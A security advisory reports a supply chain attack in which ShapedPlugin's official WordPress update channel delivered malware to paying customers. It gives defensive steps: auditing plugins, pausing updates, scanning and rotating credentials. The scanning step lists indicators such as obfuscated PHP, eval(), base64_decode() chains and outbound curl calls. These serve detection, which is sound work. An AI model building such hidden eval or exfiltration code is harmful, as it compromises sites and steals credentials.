ShapedPlugin Supply Chain Attack Delivers Malware Through Official WordPress Plugin Updates

Official Update Channel Weaponized Against Paying Customers

Attackers have compromised ShapedPlugin's plugin update delivery infrastructure, pushing malware-laced releases directly to WordPress sites through the vendor's own official update system. Multiple ShapedPlugin plugins were affected, with infected packages distributed specifically to paying customers — the users most likely to have automatic updates enabled and to trust what their licensed software serves them.

ShapedPlugin publishes a suite of widely-used WordPress plugins including WP Carousel, Easy Accordion, Restaurant Menu / Food Ordering System, and others, collectively installed across hundreds of thousands of sites. The attack did not require exploiting a vulnerability in the plugins themselves; instead, the threat actor compromised the upstream distribution pipeline, so standard integrity assumptions around "I'm running the official version" broke down entirely.

Why This Is Worse Than a Normal Plugin Vulnerability

Supply chain attacks through an official update mechanism are categorically more dangerous than a disclosed CVE. With a CVE, you know what's broken and can patch it. Here, the patch was the attack vector. Every site configured to auto-update ShapedPlugin products — the recommended posture for most WordPress operators — silently received the compromised build.

WordPress powers roughly 40% of the public web, and plugin supply chain compromises are an increasingly favored tactic precisely because trust in update channels is high. Malicious code delivered this way can establish backdoors, exfiltrate credentials or session tokens, inject payment skimmers, or enroll the site in a botnet — all before anyone notices the update happened.

Paying customers are disproportionately at risk here because premium update channels typically bypass the wordpress.org repository and its automated scanning, and because licensed users are more likely to have set-and-forget auto-update policies.

What To Do Right Now

1. Audit your plugin inventory. Check every WordPress installation for ShapedPlugin products. Look for WP Carousel Free/Pro, Easy Accordion Free/Pro, Restaurant Menu, Carousel Slider, WP Grid Builder, and any other ShapedPlugin-branded items.

2. Do not update further until clean builds are confirmed. Disable automatic updates for ShapedPlugin plugins temporarily. Monitor the vendor's official communications and wordpress.org plugin pages for statements on which version numbers are safe.

3. Scan for indicators of compromise. Run a server-side malware scanner (Wordfence, MalCare, or a CLI tool like maldet) against wp-content/plugins/ for affected plugins. Look specifically for obfuscated PHP, unexpected eval(), base64_decode() chains, or outbound curl calls added to plugin files.

4. Check for persistent backdoors. Attackers who gain code execution often drop a secondary backdoor outside the plugin directory. Scan wp-content/uploads/, theme directories, and wp-config.php for recently modified PHP files.

5. Review access logs. Look for unusual POST requests, outbound connections to unfamiliar IPs, or admin account creation events in the window after the compromised update would have been installed.

6. Rotate credentials if any doubt exists. WordPress admin passwords, database credentials, and any API keys stored in wp-config.php or plugin settings should be rotated if you cannot rule out compromise.